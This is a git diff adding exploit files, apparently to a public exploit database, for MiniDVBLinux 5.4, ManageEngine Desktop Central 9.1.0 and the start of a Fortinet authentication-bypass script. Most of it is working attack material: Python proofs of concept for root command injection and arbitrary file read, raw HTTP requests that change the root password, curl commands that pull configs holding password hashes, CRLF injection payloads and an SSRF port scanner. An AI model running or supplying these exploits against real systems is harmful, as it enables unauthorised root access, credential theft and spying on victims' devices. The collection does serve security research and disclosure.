+ +
diff --git a/exploits/hardware/remote/51091.txt b/exploits/hardware/remote/51091.txt new file mode 100644 index 000000000..16d6f07bd --- /dev/null +++ b/exploits/hardware/remote/51091.txt @@ -0,0 +1,73 @@ +# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit +# Exploit Author: LiquidWorm + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application is vulnerable to unauthenticated configuration +download when direct object reference is made to the backup function +using an HTTP GET request. This will enable the attacker to disclose +sensitive information and help her in authentication bypass, privilege +escalation and full system access. + +==================================================================== +/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh: +------------------------------------------------------------ +01: +02: if [ "$GET_action" = "getconfig" ]; then +03: . /etc/rc.config +04: header "Content-Type: application/x-compressed-tar" +05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz" +06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null +07: cat /tmp/backup_config_$$.tgz +08: rm -rf /tmp/backup_config* +09: exit +10: fi +11: ?> +12:
+ +==================================================================== + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5713 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php + + +24.09.2022 + +-- + + +> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz +> mkdir configdir +> tar -xvzf config.tgz -C .\configdir +> cd configdir && cd etc +> type passwd +root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh +daemon:!:1:1::/: +ftp:!:40:2:FTP account:/:/bin/sh +user:!:500:500::/home/user:/bin/sh +nobody:!:65534:65534::/tmp: +_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin +> \ No newline at end of file diff --git a/exploits/hardware/remote/51093.txt b/exploits/hardware/remote/51093.txt new file mode 100644 index 000000000..0600039b6 --- /dev/null +++ b/exploits/hardware/remote/51093.txt @@ -0,0 +1,53 @@ +# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) +# Exploit Author: LiquidWorm + +MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application allows the usage of the SVDRP protocol/commands +to be sent by a remote attacker to manipulate and/or control remotely +the TV. + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5714 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php + + +24.09.2022 + +-- + + +Send a message to the TV screen: + +curl http://ip:8008/?site=commands§ion=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU! + +220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8 +250 Message queued +221 mld closing connection + +For more commands: + - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands \ No newline at end of file diff --git a/exploits/hardware/remote/51094.txt b/exploits/hardware/remote/51094.txt new file mode 100644 index 000000000..21386a74a --- /dev/null +++ b/exploits/hardware/remote/51094.txt @@ -0,0 +1,156 @@ +# Exploit Title: MiniDVBLinux 5.4 - Change Root Password +# Exploit Author: LiquidWorm +MiniDVBLinux 5.4 Change Root Password PoC + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application allows a remote attacker to change the root +password of the system without authentication (disabled by default) +and verification of previously assigned credential. Command execution +also possible using several POST parameters. + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5715 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php + + +24.09.2022 + +-- + + +Default root password: mld500 + +Change system password: +----------------------- + +POST /?site=setup§ion=System HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 +Cache-Control: max-age=0 +Connection: keep-alive +Content-Length: 778 +Content-Type: application/x-www-form-urlencoded +Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba +Host: ip:8008 +Origin: http://ip:8008 +Referer: http://ip:8008/?site=setup§ion=System +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 +sec-gpc: 1 + +APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save¶ms=&changed=SYSTEM_PASSWORD+ + + +Pretty post data: + +APT_UPGRADE_CHECK: 1 +APT_SYSTEM_ID: 1 +APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass +APT_PACKAGE_CLASS: stable +SYSTEM_NAME: MiniDVBLinux +SYSTEM_VERSION_command: /etc/setup/base.sh setversion +SYSTEM_VERSION: 5.4 +SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword +SYSTEM_PASSWORD: r00t +BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi +BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd +BUSYBOX_NTPD: 1 +LOG_LEVEL: 1 +SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog +SYSLOG_SIZE: +LANG_command: /etc/setup/locales.sh setlang +LANG: en_GB.UTF-8 +TIMEZONE_command: /etc/setup/locales.sh settimezone +TIMEZONE: Europe/Kumanovo +KEYMAP_command: /etc/setup/locales.sh setkeymap +KEYMAP: de-latin1 +action: save +params: +changed: SYSTEM_PASSWORD + + +Eenable webif password check: +----------------------------- + +POST /?site=setup§ion=System HTTP/1.1 + +APT_UPGRADE_CHECK: 1 +APT_SYSTEM_ID: 1 +APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass +APT_PACKAGE_CLASS: stable +SYSTEM_NAME: MiniDVBLinux +SYSTEM_VERSION_command: /etc/setup/base.sh setversion +SYSTEM_VERSION: 5.4 +SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword +SYSTEM_PASSWORD: +BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi +BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd +BUSYBOX_NTPD: 1 +LOG_LEVEL: 1 +SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog +SYSLOG_SIZE: +LANG_command: /etc/setup/locales.sh setlang +LANG: en_GB.UTF-8 +TIMEZONE_command: /etc/setup/locales.sh settimezone +TIMEZONE: Europe/Berlin +KEYMAP_command: /etc/setup/locales.sh setkeymap +KEYMAP: de-latin1 +WEBIF_PASSWORD_CHECK: 1 +action: save +params: +changed: WEBIF_PASSWORD_CHECK + + +Disable webif password check: +----------------------------- + +POST /?site=setup§ion=System HTTP/1.1 + +APT_UPGRADE_CHECK: 1 +APT_SYSTEM_ID: 1 +APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass +APT_PACKAGE_CLASS: stable +SYSTEM_NAME: MiniDVBLinux +SYSTEM_VERSION_command: /etc/setup/base.sh setversion +SYSTEM_VERSION: 5.4 +SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword +SYSTEM_PASSWORD: +BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi +BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd +BUSYBOX_NTPD: 1 +LOG_LEVEL: 1 +SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog +SYSLOG_SIZE: +LANG_command: /etc/setup/locales.sh setlang +LANG: en_GB.UTF-8 +TIMEZONE_command: /etc/setup/locales.sh settimezone +TIMEZONE: Europe/Berlin +KEYMAP_command: /etc/setup/locales.sh setkeymap +KEYMAP: de-latin1 +action: save +params: +changed: WEBIF_PASSWORD_CHECK \ No newline at end of file diff --git a/exploits/hardware/remote/51095.txt b/exploits/hardware/remote/51095.txt new file mode 100644 index 000000000..aa4a4ee9b --- /dev/null +++ b/exploits/hardware/remote/51095.txt @@ -0,0 +1,66 @@ +# Exploit Title: MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure +# Exploit Author: LiquidWorm +MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application suffers from an unauthenticated live stream +disclosure when /tpl/tv_action.sh is called and generates a snapshot +in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP). + +-------------------------------------------------------------------- +/var/www/tpl/tv_action.sh: +-------------------------- +01: #!/bin/sh +02: +03: header +04: +05: quality=60 +06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")" +07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null +-------------------------------------------------------------------- + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5716 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php + + +24.09.2022 + +-- + + +1. Generate screengrab: + - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" + - Response: +220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8 +250 Grabbed image /tmp/tv.jpg 60 +221 mld closing connection + +2. View screengrab: + - Request: curl http://ip:8008/images/tv.jpg + +3. Or use a browser: + - http://ip:8008/home?site=remotecontrol \ No newline at end of file diff --git a/exploits/hardware/remote/51096.py b/exploits/hardware/remote/51096.py new file mode 100755 index 000000000..e59fe6279 --- /dev/null +++ b/exploits/hardware/remote/51096.py @@ -0,0 +1,67 @@ +# Exploit Title: MiniDVBLinux 5.4 - Remote Root Command Injection +# Exploit Author: LiquidWorm +#!/usr/bin/env python3 +# +# +# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability +# +# +# Vendor: MiniDVBLinux +# Product web page: https://www.minidvblinux.de +# Affected version: <=5.4 +# +# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +# way to convert a standard PC into a Multi Media Centre based on the +# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +# Linux based Digital Video Recorder: Watch TV, Timer controlled +# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +# via browser, and a lot more. MLD strives to be as small as possible, +# modular, simple. It supports numerous hardware platforms, like classic +# desktops in 32/64bit and also various low power ARM systems. +# +# Desc: The application suffers from an OS command injection vulnerability. +# This can be exploited to execute arbitrary commands with root privileges. +# +# Tested on: MiniDVBLinux 5.4 +# BusyBox v1.25.1 +# Architecture: armhf, armhf-rpi2 +# GNU/Linux 4.19.127.203 (armv7l) +# VideoDiskRecorder 2.4.6 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2022-5717 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php +# +# +# 24.09.2022 +# + +import requests +import re,sys + +#test case 001 +#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT +#test case 004 +#http://ip:8008/?site=about&name=blind&file=$(id) +#cat: can't open 'uid=0(root)': No such file or directory +#cat: can't open 'gid=0(root)': No such file or directory +#test case 005 +#http://ip:8008/?site=about&name=blind&file=`id` +#cat: can't open 'uid=0(root)': No such file or directory +#cat: can't open 'gid=0(root)': No such file or directory + +if len(sys.argv) < 3: + print('MiniDVBLinux 5.4 Command Injection PoC') + print('Usage: ./mldhd_root2.py [url] [cmd]') + sys.exit(17) +else: + url = sys.argv[1] + cmd = sys.argv[2] + +req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')') +outz = re.search('(.*?)',req.text,flags=re.S).group() +print(outz.replace('
','').replace('','')) \ No newline at end of file diff --git a/exploits/hardware/remote/51097.py b/exploits/hardware/remote/51097.py new file mode 100755 index 000000000..50903906c --- /dev/null +++ b/exploits/hardware/remote/51097.py @@ -0,0 +1,61 @@ +# Exploit Title: MiniDVBLinux 5.4 - Arbitrary File Read +# Exploit Author: LiquidWorm +#!/usr/bin/env python3 +# +# +# MiniDVBLinux 5.4 Arbitrary File Read Vulnerability +# +# +# Vendor: MiniDVBLinux +# Product web page: https://www.minidvblinux.de +# Affected version: <=5.4 +# +# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +# way to convert a standard PC into a Multi Media Centre based on the +# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +# Linux based Digital Video Recorder: Watch TV, Timer controlled +# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +# via browser, and a lot more. MLD strives to be as small as possible, +# modular, simple. It supports numerous hardware platforms, like classic +# desktops in 32/64bit and also various low power ARM systems. +# +# Desc: The distribution suffers from an arbitrary file disclosure +# vulnerability. Using the 'file' GET parameter attackers can disclose +# arbitrary files on the affected device and disclose sensitive and system +# information. +# +# Tested on: MiniDVBLinux 5.4 +# BusyBox v1.25.1 +# Architecture: armhf, armhf-rpi2 +# GNU/Linux 4.19.127.203 (armv7l) +# VideoDiskRecorder 2.4.6 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2022-5719 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php +# +# +# 24.09.2022 +# + +import requests +import re,sys + +#test case 001 +#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT + +if len(sys.argv) < 3: + print('MiniDVBLinux 5.4 File Disclosure PoC') + print('Usage: ./mldhd_fd.py [url] [file]') + sys.exit(17) +else: + url = sys.argv[1] + fil = sys.argv[2] + +req = requests.get(url+'/?site=about&name=ZSL&file='+fil) +outz = re.search('
(.*?)',req.text,flags=re.S).group() +print(outz.replace('
','').replace('','')) \ No newline at end of file diff --git a/exploits/jsp/webapps/51082.txt b/exploits/jsp/webapps/51082.txt new file mode 100644 index 000000000..d3707ada3 --- /dev/null +++ b/exploits/jsp/webapps/51082.txt @@ -0,0 +1,234 @@ +# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities +# Discovery by: Rafael Pedrero +# Discovery Date: 2021-02-14 +# Software Link : http://www.desktopcentral.com +# Tested Version: 9.1.0 (Build No: 91084) +# Tested on: Windows 10 + +# Vulnerability Type: CRLF injection (CRLF) - 1 + +CVSS v3: 6.1 +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-93 + +Vulnerability description: CRLF injection vulnerability in ManageEngine +Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP +headers and conduct HTTP response splitting attacks via the fileName +parameter in a /STATE_ID/1613157927228/InvSWMetering.csv. + +Proof of concept: + +GET +https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true +HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 +Firefox/85.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +DNT: 1 +Connection: keep-alive +Referer: +https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering +Upgrade-Insecure-Requests: 1 +Content-Length: 0 +Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; +STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; +showRefMsg=false; summarypage=false; +DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; +JSESSIONID=0B20DEF653941DAF5748931B67972CDB; +JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 +Host: localhost + +Response: +HTTP/1.1 200 OK +Date: +Server: Apache +Pragma: public +Cache-Control: max-age=0 +Expires: Wed, 31 Dec 1969 16:00:00 PST +SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; +Secure +Set-Cookie: buildNum=91084; Path=/ +Set-Cookie: showRefMsg=false; Path=/ +Set-Cookie: summarypage=false; Path=/ +Set-Cookie: dc_customerid=1; Path=/ +Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ +Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ +Set-Cookie: screenResolution=1280x1024; Path=/ +Content-Disposition: attachment; filename=any +Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv +X-dc-header: yes +Content-Length: 95 +Keep-Alive: timeout=5, max=20 +Connection: Keep-Alive +Content-Type: text/csv;charset=UTF-8 + + +# Vulnerability Type: CRLF injection (CRLF) - 2 + +CVSS v3: 6.1 +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-93 + +Vulnerability description: CRLF injection vulnerability in ManageEngine +Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP +headers and conduct HTTP response splitting attacks via the fileName +parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf. + +Proof of concept: + +GET +https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true +HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 +Firefox/85.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +DNT: 1 +Connection: keep-alive +Referer: +https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering +Upgrade-Insecure-Requests: 1 +Content-Length: 0 +Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; +STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; +showRefMsg=false; summarypage=false; +DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; +JSESSIONID=0B20DEF653941DAF5748931B67972CDB; +JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 +Host: localhost + + +HTTP/1.1 200 OK +Date: +Server: Apache +Pragma: public +Cache-Control: max-age=0 +Expires: Wed, 31 Dec 1969 16:00:00 PST +SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; +Secure +Set-Cookie: buildNum=91084; Path=/ +Set-Cookie: showRefMsg=false; Path=/ +Set-Cookie: summarypage=false; Path=/ +Set-Cookie: dc_customerid=1; Path=/ +Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ +Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ +Set-Cookie: screenResolution=1280x1024; Path=/ +Content-Disposition: attachment; filename=any +Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013 +X-dc-header: yes +Content-Length: 4470 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/pdf;charset=UTF-8 + + + +# Vulnerability Type: Server-Side Request Forgery (SSRF) + +CVSS v3: 8.0 +CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H +CWE: CWE-918 Server-Side Request Forgery (SSRF) + +Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability +in ManageEngine Desktop Central 9.1.0 allows an attacker can force a +vulnerable server to trigger malicious requests to third-party servers or +to internal resources. This vulnerability allows authenticated attacker +with network access via HTTP and can then be leveraged to launch specific +attacks such as a cross-site port attack, service enumeration, and various +other attacks. + +Proof of concept: + +Save this content in a python file (ex. ssrf_manageenginedesktop9.py), +change the variable sitevuln value with ip address: + +import argparse +from termcolor import colored +import requests +import urllib3 +import datetime +urllib3.disable_warnings() + +print(colored(''' +------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ +''',"red")) + +def smtpConfig_ssrf(target,port,d): + now1 = datetime.datetime.now() + text = '' + sitevuln = 'localhost' + url = 'https:// +'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin% +40manageengine.com +&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin% +40manageengine.com' + cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; +buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; +JSESSIONID=D10A9C62D985A0966647099E14C622F8; +DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0' + try: + response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 +(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': +'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': +'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': ' +https://192.168.56.250:8383/smtpConfig.do','Cookie': + cookie,'Connection': 'keep-alive'},verify=False, timeout=10) + + text = response.text + now2 = datetime.datetime.now() + rest = (now2 - now1) + seconds = rest.total_seconds() + + if ('updateRefMsgCookie' in text): + return colored('Cookie lost',"yellow") + + if d == "0": + print ('Time response: ' + str(rest) + '\n' + text + '\n') + + if (seconds > 5.0): + return colored('open',"green") + else: + return colored('closed',"red") + + except: + now2 = datetime.datetime.now() + rest = (now2 - now1) + seconds = rest.total_seconds() + if (seconds > 10.0): + return colored('open',"green") + else: + return colored('closed',"red") + + return colored('unknown',"yellow") + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - +SSRF Open ports",required=True) + parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 +- SSRF Open ports",required=True) + parser.add_argument('-d','--debug', help="ManageEngine Desktop Central +9 - SSRF Open ports (0 print or 1 no print)",required=False) + args = parser.parse_args() + timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug) + print (args.ip + ':' + args.port + ' ' + timeresp + '\n') + + + +And: + +$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080 + +------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ + +192.168.56.250:8080 open + +$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777 + +------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ + +192.168.56.250:7777 closed \ No newline at end of file diff --git a/exploits/multiple/webapps/51092.sh b/exploits/multiple/webapps/51092.sh new file mode 100755 index 000000000..9cf071510 --- /dev/null +++ b/exploits/multiple/webapps/51092.sh @@ -0,0 +1,55 @@ +# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager) +# Date: 13/10/2022 +# Exploit Author: Felipe Alcantara (Filiplain) +# Vendor Homepage: https://www.fortinet.com/ +# Version: +#FortiOS from 7.2.0 to 7.2.1 +#FortiOS from 7.0.0 to 7.0.6 +#FortiProxy 7.2.0 +#FortiProxy from 7.0.0 to 7.0.6 +#FortiSwitchManager 7.2.0 +#FortiSwitchManager 7.0.0 +# Tested on: Kali Linux +# CVE : CVE-2022-40684 + +# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass + +# Usage: ./poc.sh